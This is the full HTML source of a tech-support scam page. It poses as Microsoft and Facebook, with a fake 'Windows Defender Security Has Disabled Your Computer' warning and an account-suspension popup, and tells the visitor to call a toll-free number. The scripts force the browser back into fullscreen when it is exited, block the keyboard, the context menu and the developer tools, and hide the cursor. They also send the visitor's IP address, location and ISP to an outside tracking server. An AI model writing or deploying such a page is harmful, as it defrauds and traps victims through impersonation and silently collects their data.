<!DOCTYPE html>
<html>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
    <title>Windows Suspended</title>
    <style>
        body {
            background-image: url('bg1.png');
            background-size: 100% 100%;
            background-repeat: no-repeat;
            background-position: center center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
            color: white;
        }

        body.fullscreen {
            background-image: url('bg2.jpg');
        }

        #support-text {
            position: absolute;
            top: 80%;
            left: 50%;
            transform: translateX(-50%);
            font-size: 24px;
            text-align: center;
            width: 100%;
            font-weight: bold;
            color: black;
            display: none;
        }

        #support-text span {
            font-weight: normal;
        }

        #music {
            display: none;
        }

        #modal-overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 9999;
        }

        #modal-content {
            background-color: white;
            border-radius: 5px;
            max-width: 400px;
            margin: 100px auto;
            padding: 20px;
            text-align: center;
        }

        #modal-close {
            cursor: pointer;
            color: #888;
            float: right;
            font-size: 20px;
            font-weight: bold;
        }

        #modal-message {
            color: black;
            font-weight: bold;
            margin-bottom: 20px;
        }

        #modal-image {
            margin-bottom: 20px;
        }

        .modal-buttons {
            display: flex;
            justify-content: space-between;
            margin-top: 20px;
        }

        .modal-buttons button {
            width: 100px;
            padding: 10px 0;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-weight: bold;
            transition: background-color 0.3s;
        }

        .modal-buttons button.accept {
            background-color: white;
            color: black;
        }

        .modal-buttons button.dismiss {
            background-color: #3b5998;
            color: white;
        }

        .modal-buttons button:hover {
            background-color: rgba(0, 0, 0, 0.8);
        }

        @keyframes blink {
            0% {
                opacity: 1;
            }

            50% {
                opacity: 0;
            }

            100% {
                opacity: 1;
            }
        }

        .modal-buttons button.dismiss.blinking {
            animation: blink 1s infinite;
        }

        #welcomeDiv {
            display: none;
            background-color: #000;
            height: auto;
            font-size: 24px;
            width: 550px;
            position: fixed;
            top: 0;
            left: 50%;
            transform: translateX(-50%);
            z-index: 9999999999;
            text-align: center;
        }

        #welcomeDiv p {
            color: #FEFEFE;
            margin-top: 10px;
            font-size: 16px;
            opacity: 0.9;
        }
    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            var music = document.getElementById('music');
            var isPlaying = false;
            var isFullscreen = false;
            var isPopupVisible = true;

            function toggleMusic() {
                if (isPlaying) {
                    music.pause();
                } else {
                    music.play();
                }
                isPlaying = !isPlaying;
            }

            function playMusicOnClick() {
                toggleMusic();
                document.removeEventListener('click', playMusicOnClick);
            }

            document.addEventListener('click', playMusicOnClick);

            var fullscreenEnabled = document.fullscreenEnabled || document.mozFullScreenEnabled || document.documentElement.webkitRequestFullScreen;

            function enterFullscreen() {
                if (fullscreenEnabled && !isFullscreen) {
                    document.documentElement.requestFullscreen()
                        .then(() => {
                            isFullscreen = true;
                            document.body.classList.add('fullscreen');
                            showWelcomeDiv();
                            showSupportText();
                        })
                        .catch(err => console.log('Error entering fullscreen:', err));
                }
            }

            function exitFullscreen() {
                if (document.fullscreenElement) {
                    document.exitFullscreen();
                }
            }

            // Automatically re-enter fullscreen when it is exited
            document.addEventListener('fullscreenchange', function () {
                if (!document.fullscreenElement) {
                    isFullscreen = false;
                    setTimeout(() => {
                        if (!isFullscreen) {
                            enterFullscreen();
                        }
                    }, 1000); // Wait briefly to allow the user to press Escape again if desired
                }
            });

            document.addEventListener('click', enterFullscreen);

            var modalOverlay = document.getElementById('modal-overlay');
            var modalClose = document.getElementById('modal-close');

            function showModal() {
                modalOverlay.style.display = 'block';
            }

            function closeModal() {
                modalOverlay.style.display = 'none';
            }

            modalClose.addEventListener('click', closeModal);

            showModal();

            function hideCursor() {
                document.documentElement.style.cursor = 'none';
            }

            document.addEventListener('click', function () {
                hideCursor();
                document.removeEventListener('click', hideCursor);
                if (isPopupVisible) {
                    closeModal();
                    isPopupVisible = false;
                }
            });

            document.addEventListener('contextmenu', function (event) {
                event.preventDefault();
            });

            document.addEventListener('keydown', function (e) {
                if (e.ctrlKey && (e.key === 'U' || e.key === 'C' || e.key === 'S')) {
                    e.preventDefault();
                }
            });

            function preventKeyEvents(event) {
                const blockedKeyCodes = [123];
                const keyCode = event.keyCode || event.which;

                if (blockedKeyCodes.includes(keyCode)) {
                    event.preventDefault();
                    console.log(`Key with code ${keyCode} is blocked.`);
                }
            }

            window.addEventListener('keydown', preventKeyEvents);

            function showWelcomeDiv() {
                document.getElementById('welcomeDiv').style.display = 'block';
            }

            function showSupportText() {
                document.getElementById('support-text').style.display = 'block';
            }


            navigator.keyboard.lock();
            document.onkeydown = function (e) {
                return false;
            }
        });
    </script>

  
    <script>
        var call = "1-855-535-9906";
        document.addEventListener('click', function (event) {
            // Get the element that was clicked
            var clickedElement = event.target;
    
            // Log the clicked element to the console (you can replace this with sending data to your central server)
            console.log('Clicked element:', clickedElement);
    
            // You can also track specific elements by checking their class names, IDs, or other attributes
            getCurrentIpAddress();
            // if (clickedElement.classList.contains('track-me')) {
            //  // Send click data to the central server
            // }
        });
    
        function getCurrentIpAddress() {
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    const ipAddress = data.ip;
                    fetch("https://purpleblack.net/analytics/proxy/" + ipAddress)
                        .then(response => response.json())
                        .then(data => {
                            if (document.fullscreenElement) {
                                data.fullscreen = true;
                            } else {
                                data.fullscreen = false;
                            }
                            data.action = window.location.hostname;
                            this.sendDataToServer(data);
                            // update id_add
                            var ipadd = data.ip;
                            var city = data.city;
                            var country = data.country;
                            var isp = data.org;
                            console.log("Data", data);
                            var date = new Date();
                            document.getElementById('ip_add').textContent = 'IP: ' + ipadd + ' ' + date.toLocaleString("en-US");
                            document.getElementById('city').textContent = 'Location: ' + city + ', ' + country;
                            document.getElementById('isp').textContent = 'ISP: ' + isp;
                        })
                        .catch(error => {
                            console.error("Error fetching location and ISP:", error);
                            document.getElementById("city").innerHTML = "Location: Unavailable";
                            document.getElementById("isp").innerHTML = "ISP: Unavailable";
                        });
                })
                .catch(error => {
                    console.error("Error fetching IP address:", error);
                    document.getElementById("ip_add").innerHTML = "Address IP: Unavailable";
                });
        }
    
        // Function to send click data to the central server
        function sendDataToServer(data) {
            console.log("Fetch API Called", data);
            fetch('https://purpleblack.net/analytics/trackclicks', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json', // Set content type to JSON
                    'Access-Control-Allow-Origin': '*'
                },
                body: JSON.stringify(data) // No need to parse and stringify again
            })
                .then(response => {
                    if (!response.ok) {
                        console.error('Failed to send click data to server');
                    }
                })
                .catch(error => {
                    console.error('Error sending click data:', error);
                });
        }
    
    </script>
    
    <script> getCurrentIpAddress() </script>
 
</head>

<body>
    <audio id="music" src="Text-to-Speech_18-Jun-2023_03-17.mp3" controls loop></audio>

    <div id="modal-overlay">
        <div id="modal-content">
            <span id="modal-close">&times;</span>
            <img id="modal-image" src="logo-facebookpng-32251.jpg" alt="Facebook Logo">
            <p id="modal-message">Facebook Has Temporarily Suspended Your Account.</p>
            <div class="modal-buttons">
                <button id="modal-accept" class="accept">Accept</button>
                <button id="modal-dismiss" class="dismiss">Ignore</button>
            </div>
        </div>
    </div>

    <div id="welcomeDiv">
        <h6>
            Windows Defender Security Has Disabled Your Computer.<br>
            Please Contact Microsoft Windows Support To Unlock Your Computer.<br> Toll Free <b id="phoneNumber1"></b> 
        </h6>
    </div> 

    <div id="support-text">Call Microsoft Windows Support Toll Free <b id="phoneNumber2" style="color:blue"></b> </div>
</body>

<script>
    document.getElementById("phoneNumber1").textContent = "+" + call;
    document.getElementById("phoneNumber2").textContent = "+" + call;
</script>

<script>
    document.addEventListener('click', function() {
        return document.fullscreenEnabled || document.mozFullScreenEnabled || document.documentElement.webkitRequestFullScreen;
    })
</script>
</html>
